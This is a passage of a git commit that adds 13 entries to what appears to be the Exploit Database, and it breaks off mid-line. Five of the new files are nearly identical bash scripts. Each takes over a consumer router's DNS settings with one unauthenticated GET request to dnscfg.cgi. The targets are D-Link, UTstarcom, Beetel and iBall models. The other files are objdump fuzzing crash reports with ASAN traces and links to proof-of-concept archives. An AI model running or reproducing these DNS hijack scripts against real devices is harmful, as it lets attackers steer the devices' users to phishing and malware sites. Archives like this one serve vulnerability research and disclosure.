From 380d33dd22ae310dd91103288129a7908d90d759 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 20 Jun 2017 05:01:28 +0000 Subject: [PATCH] DB: 2017-06-20 13 new exploits GNU binutils - 'rx_decode_opcode' Buffer Overflow GNU binutils - 'disassemble_bytes' Heap Overflow GNU binutils - 'bfd_get_string' Stack Buffer Overflow GNU binutils - 'decode_pseudodbg_assert_0' Buffer Overflow GNU binutils - 'ieee_object_p' Stack Buffer Overflow GNU binutils - 'print_insn_score16' Buffer Overflow GNU binutils - 'aarch64_ext_ldst_reglist' Buffer Overflow iBall Baton iB-WRA150N - Unauthenticated DNS Change nuevoMailer 6.0 - SQL Injection UTstarcom WA3002G4 - Unauthenticated DNS Change D-Link DSL-2640U - Unauthenticated DNS Change Beetel BCM96338 Router - Unauthenticated DNS Change D-Link DSL-2640B - Unauthenticated Remote DNS Change --- files.csv | 13 +++++ platforms/hardware/webapps/42192.sh | 82 +++++++++++++++++++++++++++++ platforms/hardware/webapps/42194.sh | 82 +++++++++++++++++++++++++++++ platforms/hardware/webapps/42195.sh | 82 +++++++++++++++++++++++++++++ platforms/hardware/webapps/42196.sh | 82 +++++++++++++++++++++++++++++ platforms/hardware/webapps/42197.sh | 82 +++++++++++++++++++++++++++++ platforms/linux/dos/42198.txt | 43 +++++++++++++++ platforms/linux/dos/42199.txt | 78 +++++++++++++++++++++++++++ platforms/linux/dos/42200.txt | 41 +++++++++++++++ platforms/linux/dos/42201.txt | 70 ++++++++++++++++++++++++ platforms/linux/dos/42202.txt | 37 +++++++++++++ platforms/linux/dos/42203.txt | 43 +++++++++++++++ platforms/linux/dos/42204.txt | 44 ++++++++++++++++ platforms/php/webapps/42193.txt | 27 ++++++++++ 14 files changed, 806 insertions(+) create mode 100755 platforms/hardware/webapps/42192.sh create mode 100755 platforms/hardware/webapps/42194.sh create mode 100755 platforms/hardware/webapps/42195.sh create mode 100755 platforms/hardware/webapps/42196.sh create mode 100755 platforms/hardware/webapps/42197.sh create mode 100755 platforms/linux/dos/42198.txt create mode 100755 platforms/linux/dos/42199.txt create mode 100755 platforms/linux/dos/42200.txt create mode 100755 platforms/linux/dos/42201.txt create mode 100755 platforms/linux/dos/42202.txt create mode 100755 platforms/linux/dos/42203.txt create mode 100755 platforms/linux/dos/42204.txt create mode 100755 platforms/php/webapps/42193.txt diff --git a/files.csv b/files.csv index db729746c..9b566c5eb 100644 --- a/files.csv +++ b/files.csv @@ -5548,6 +5548,13 @@ id,file,description,date,author,platform,type,port 42189,platforms/multiple/dos/42189.html,"WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices",2017-06-16,"Google Security Research",multiple,dos,0 42190,platforms/multiple/dos/42190.html,"WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock",2017-06-16,"Google Security Research",multiple,dos,0 42191,platforms/multiple/dos/42191.html,"WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales",2017-06-16,"Google Security Research",multiple,dos,0 +42198,platforms/linux/dos/42198.txt,"GNU binutils - 'rx_decode_opcode' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0 +42199,platforms/linux/dos/42199.txt,"GNU binutils - 'disassemble_bytes' Heap Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0 +42200,platforms/linux/dos/42200.txt,"GNU binutils - 'bfd_get_string' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0 +42201,platforms/linux/dos/42201.txt,"GNU binutils - 'decode_pseudodbg_assert_0' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0 +42202,platforms/linux/dos/42202.txt,"GNU binutils - 'ieee_object_p' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0 +42203,platforms/linux/dos/42203.txt,"GNU binutils - 'print_insn_score16' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0 +42204,platforms/linux/dos/42204.txt,"GNU binutils - 'aarch64_ext_ldst_reglist' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -38016,3 +38023,9 @@ id,file,description,date,author,platform,type,port 42178,platforms/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,hardware,webapps,0 42184,platforms/aspx/webapps/42184.txt,"KBVault MySQL 0.16a - Arbitrary File Upload",2017-06-14,"Fatih Emiral",aspx,webapps,0 42185,platforms/php/webapps/42185.txt,"Joomla! Component JoomRecipe 1.0.3 - SQL Injection",2017-06-15,EziBilisim,php,webapps,0 +42192,platforms/hardware/webapps/42192.sh,"iBall Baton iB-WRA150N - Unauthenticated DNS Change",2017-06-16,"Todor Donev",hardware,webapps,0 +42193,platforms/php/webapps/42193.txt,"nuevoMailer 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",php,webapps,0 +42194,platforms/hardware/webapps/42194.sh,"UTstarcom WA3002G4 - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0 +42195,platforms/hardware/webapps/42195.sh,"D-Link DSL-2640U - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0 +42196,platforms/hardware/webapps/42196.sh,"Beetel BCM96338 Router - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0 +42197,platforms/hardware/webapps/42197.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",hardware,webapps,0 diff --git a/platforms/hardware/webapps/42192.sh b/platforms/hardware/webapps/42192.sh new file mode 100755 index 000000000..00475bd59 --- /dev/null +++ b/platforms/hardware/webapps/42192.sh @@ -0,0 +1,82 @@ +#!/bin/bash +# +# iBall Baton iB-WRA150N +# Unauthenticated Remote DNS Change Exploit +# +# Copyright 2016 (c) Todor Donev +# https://www.ethical-hacker.org/ +# https://www.facebook.com/ethicalhackerorg +# +# Description: +# The vulnerability exist in the web interface, which is +# accessible without authentication. +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + +if [[ $# -gt 3 || $# -lt 2 ]]; then + echo " iBall Baton iB-WRA150N " + echo " Unauthenticated Remote DNS Change Exploit" + echo " ===================================================================" + echo " Usage: $0 " + echo " Example: $0 133.7.133.7 8.8.8.8" + echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4" + echo "" + echo " Copyright 2017 (c) Todor Donev " + echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg" + exit; +fi +GET=`which GET 2>/dev/null` +if [ $? -ne 0 ]; then + echo " Error : libwww-perl not found =/" + exit; +fi + GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1 + diff --git a/platforms/hardware/webapps/42194.sh b/platforms/hardware/webapps/42194.sh new file mode 100755 index 000000000..28bf82114 --- /dev/null +++ b/platforms/hardware/webapps/42194.sh @@ -0,0 +1,82 @@ +#!/bin/bash +# +# UTstarcom WA3002G4 +# Unauthenticated Remote DNS Change Exploit +# +# Copyright 2017 (c) Todor Donev +# https://www.ethical-hacker.org/ +# https://www.facebook.com/ethicalhackerorg +# +# Description: +# The vulnerability exist in the web interface, which is +# accessible without authentication. +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + +if [[ $# -gt 3 || $# -lt 2 ]]; then + echo " UTstarcom WA3002G4 " + echo " Unauthenticated Remote DNS Change Exploit" + echo " ===================================================================" + echo " Usage: $0 " + echo " Example: $0 133.7.133.7 8.8.8.8" + echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4" + echo "" + echo " Copyright 2017 (c) Todor Donev " + echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg" + exit; +fi +GET=`which GET 2>/dev/null` +if [ $? -ne 0 ]; then + echo " Error : libwww-perl not found =/" + exit; +fi + GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1 + diff --git a/platforms/hardware/webapps/42195.sh b/platforms/hardware/webapps/42195.sh new file mode 100755 index 000000000..7c7ad317c --- /dev/null +++ b/platforms/hardware/webapps/42195.sh @@ -0,0 +1,82 @@ +#!/bin/bash +# +# D-Link ADSL DSL-2640U IM_1.00 +# Unauthenticated Remote DNS Change Exploit +# +# Copyright 2017 (c) Todor Donev +# https://www.ethical-hacker.org/ +# https://www.facebook.com/ethicalhackerorg +# +# Description: +# The vulnerability exist in the web interface, which is +# accessible without authentication. +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + +if [[ $# -gt 3 || $# -lt 2 ]]; then + echo " D-Link ADSL DSL-2640U IM_1.00 " + echo " Unauthenticated Remote DNS Change Exploit" + echo " ===================================================================" + echo " Usage: $0 " + echo " Example: $0 133.7.133.7 8.8.8.8" + echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4" + echo "" + echo " Copyright 2017 (c) Todor Donev " + echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg" + exit; +fi +GET=`which GET 2>/dev/null` +if [ $? -ne 0 ]; then + echo " Error : libwww-perl not found =/" + exit; +fi + GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1 + diff --git a/platforms/hardware/webapps/42196.sh b/platforms/hardware/webapps/42196.sh new file mode 100755 index 000000000..7821c10e7 --- /dev/null +++ b/platforms/hardware/webapps/42196.sh @@ -0,0 +1,82 @@ +#!/bin/bash +# +# Beetel BCM96338 ADSL Router +# Unauthenticated Remote DNS Change Exploit +# +# Copyright 2017 (c) Todor Donev +# https://www.ethical-hacker.org/ +# https://www.facebook.com/ethicalhackerorg +# +# Description: +# The vulnerability exist in the web interface, which is +# accessible without authentication. +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + +if [[ $# -gt 3 || $# -lt 2 ]]; then + echo " Beetel BCM96338 ADSL Router " + echo " Unauthenticated Remote DNS Change Exploit" + echo " ===================================================================" + echo " Usage: $0 " + echo " Example: $0 133.7.133.7 8.8.8.8" + echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4" + echo "" + echo " Copyright 2017 (c) Todor Donev " + echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg" + exit; +fi +GET=`which GET 2>/dev/null` +if [ $? -ne 0 ]; then + echo " Error : libwww-perl not found =/" + exit; +fi + GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1 + diff --git a/platforms/hardware/webapps/42197.sh b/platforms/hardware/webapps/42197.sh new file mode 100755 index 000000000..4d1fa431a --- /dev/null +++ b/platforms/hardware/webapps/42197.sh @@ -0,0 +1,82 @@ +#!/bin/bash +# +# D-Link ADSL DSL-2640B GE_1.07 +# Unauthenticated Remote DNS Change Exploit +# +# Copyright 2017 (c) Todor Donev +# https://www.ethical-hacker.org/ +# https://www.facebook.com/ethicalhackerorg +# +# Description: +# The vulnerability exist in the web interface, which is +# accessible without authentication. +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + +if [[ $# -gt 3 || $# -lt 2 ]]; then + echo " D-Link ADSL DSL-2640B GE_1.07 " + echo " Unauthenticated Remote DNS Change Exploit" + echo " ===================================================================" + echo " Usage: $0 " + echo " Example: $0 133.7.133.7 8.8.8.8" + echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4" + echo "" + echo " Copyright 2017 (c) Todor Donev " + echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg" + exit; +fi +GET=`which GET 2>/dev/null` +if [ $? -ne 0 ]; then + echo " Error : libwww-perl not found =/" + exit; +fi + GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1 + diff --git a/platforms/linux/dos/42198.txt b/platforms/linux/dos/42198.txt new file mode 100755 index 000000000..25b2981b3 --- /dev/null +++ b/platforms/linux/dos/42198.txt @@ -0,0 +1,43 @@ +Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21587 + +I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer. + +Please find attached the minimized file causing the issue ("Input") and the +ASAN report log ("Output"). Below is the reduced stacktrace with links to the +corresponding source lines on a GitHub mirror. + +The command I used was `objdump -D `. + +Let me know if there is any additional information I can provide. + +-- + +Input: 9ed130cf25d8df5207cad7fc0de4fc1f.109246746a4907b00292c7837b29f085.min +Output: 9ed130cf25d8df5207cad7fc0de4fc1f.109246746a4907b00292c7837b29f085.txt + +Error in "rx_decode_opcode": global-buffer-overflow + in rx_decode_opcode at opcodes/rx-decode.opc:288 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/rx-decode.opc#L288) + in print_insn_rx at opcodes/rx-dis.c:123 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/rx-dis.c#L123) + in disassemble_bytes at binutils/objdump.c:1864 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864) + in disassemble_section at binutils/objdump.c:2309 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309) + in bfd_map_over_sections at bfd/section.c:1395 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395) + in disassemble_data at binutils/objdump.c:2445 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445) + in dump_bfd at binutils/objdump.c:3547 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547) + in display_file at binutils/objdump.c:3714 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714) + in main at binutils/objdump.c:4016 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016) + +Additional Information: +The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42198.zip diff --git a/platforms/linux/dos/42199.txt b/platforms/linux/dos/42199.txt new file mode 100755 index 000000000..fd5787296 --- /dev/null +++ b/platforms/linux/dos/42199.txt @@ -0,0 +1,78 @@ +Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21580 + +I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer. + +Please find attached the minimized file causing the issue ("Input") and the +ASAN report log ("Output"). Below is the reduced stacktrace with links to the +corresponding source lines on a GitHub mirror. + +The command I used was `objdump -D `. + +Let me know if there is any additional information I can provide. + +-- + +Input: 37a2b1374545eb23eed0eea880de6226.ad5cda09828cea9d238db2184e95406b.min +Output: 37a2b1374545eb23eed0eea880de6226.ad5cda09828cea9d238db2184e95406b.txt + +Error in "disassemble_bytes": heap-buffer-overflow + in disassemble_bytes at binutils/objdump.c:1993 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1993) + in disassemble_section at binutils/objdump.c:2309 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309) + in bfd_map_over_sections at bfd/section.c:1395 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395) + in disassemble_data at binutils/objdump.c:2445 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445) + in dump_bfd at binutils/objdump.c:3547 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547) + in display_file at binutils/objdump.c:3714 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714) + in main at binutils/objdump.c:4016 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016) + +Input: 77125fccb44694b0db18006db1f0f4d3.64e76dd7ab33d15c8293caeca73c704a.min +Output: 77125fccb44694b0db18006db1f0f4d3.64e76dd7ab33d15c8293caeca73c704a.txt + +Error in "disassemble_bytes": heap-buffer-overflow + in disassemble_bytes at binutils/objdump.c:1932 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1932) + in disassemble_section at binutils/objdump.c:2309 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309) + in bfd_map_over_sections at bfd/section.c:1395 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395) + in disassemble_data at binutils/objdump.c:2445 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445) + in dump_bfd at binutils/objdump.c:3547 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547) + in display_file at binutils/objdump.c:3714 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714) + in main at binutils/objdump.c:4016 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016) + +Input: c3269b8eae3f3ec0001d835e66795702.6e6557284eb14f91acf6c2576396517c.min +Output: c3269b8eae3f3ec0001d835e66795702.6e6557284eb14f91acf6c2576396517c.txt + +Error in "disassemble_bytes": heap-buffer-overflow + in disassemble_bytes at binutils/objdump.c:1926 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1926) + in disassemble_section at binutils/objdump.c:2309 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309) + in bfd_map_over_sections at bfd/section.c:1395 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395) + in disassemble_data at binutils/objdump.c:2445 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445) + in dump_bfd at binutils/objdump.c:3547 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547) + in display_file at binutils/objdump.c:3714 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714) + in main at binutils/objdump.c:4016 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016) + + +Additional Information: +The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`. + + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42199.zip diff --git a/platforms/linux/dos/42200.txt b/platforms/linux/dos/42200.txt new file mode 100755 index 000000000..a740882d1 --- /dev/null +++ b/platforms/linux/dos/42200.txt @@ -0,0 +1,41 @@ +Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21581 + +I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer. + +Please find attached the minimized file causing the issue ("Input") and the +ASAN report log ("Output"). Below is the reduced stacktrace with links to the +corresponding source lines on a GitHub mirror. + +The command I used was `objdump -D `. + +Let me know if there is any additional information I can provide. + +-- + +Input: 02d8fa874391d563ccfd5911ff5f5cf8.fe651c9b03ff955c157ecee745208476.min +Output: 02d8fa874391d563ccfd5911ff5f5cf8.fe651c9b03ff955c157ecee745208476.txt + +Error in "bfd_get_string": stack-buffer-overflow + in bfd_get_string at bfd/ieee.c:198 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L198) + in read_id at bfd/ieee.c:227 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L227) + in ieee_object_p at bfd/ieee.c:1907 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L1907) + in bfd_check_format_matches at bfd/format.c:311 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/format.c#L311) + in display_object_bfd at binutils/objdump.c:3602 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3602) + in display_any_bfd at binutils/objdump.c:3693 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3693) + in display_file at binutils/objdump.c:3714 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714) + in main at binutils/objdump.c:4016 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016) + +Additional Information: +The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42200.zip diff --git a/platforms/linux/dos/42201.txt b/platforms/linux/dos/42201.txt new file mode 100755 index 000000000..afca80a44 --- /dev/null +++ b/platforms/linux/dos/42201.txt @@ -0,0 +1,70 @@ +Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21586 + +I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer. + +Please find attached the minimized file causing the issue ("Input") and the +ASAN report log ("Output"). Below is the reduced stacktrace with links to the +corresponding source lines on a GitHub mirror. + +The command I used was `objdump -D `. + +Let me know if there is any additional information I can provide. + +-- + +Input: 5ddfa2412fa85ccaec333ef01e682e5c.1a654bffa0e51502d471945837d8c8d2.min +Output: 5ddfa2412fa85ccaec333ef01e682e5c.1a654bffa0e51502d471945837d8c8d2.txt + +Error in "decode_pseudodbg_assert_0": global-buffer-overflow + in decode_pseudodbg_assert_0 at opcodes/bfin-dis.c:4604 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4604) + in _print_insn_bfin at opcodes/bfin-dis.c:4760 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4760) + in print_insn_bfin at opcodes/bfin-dis.c:4778 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4778) + in disassemble_bytes at binutils/objdump.c:1864 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864) + in disassemble_section at binutils/objdump.c:2309 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309) + in bfd_map_over_sections at bfd/section.c:1395 + (see 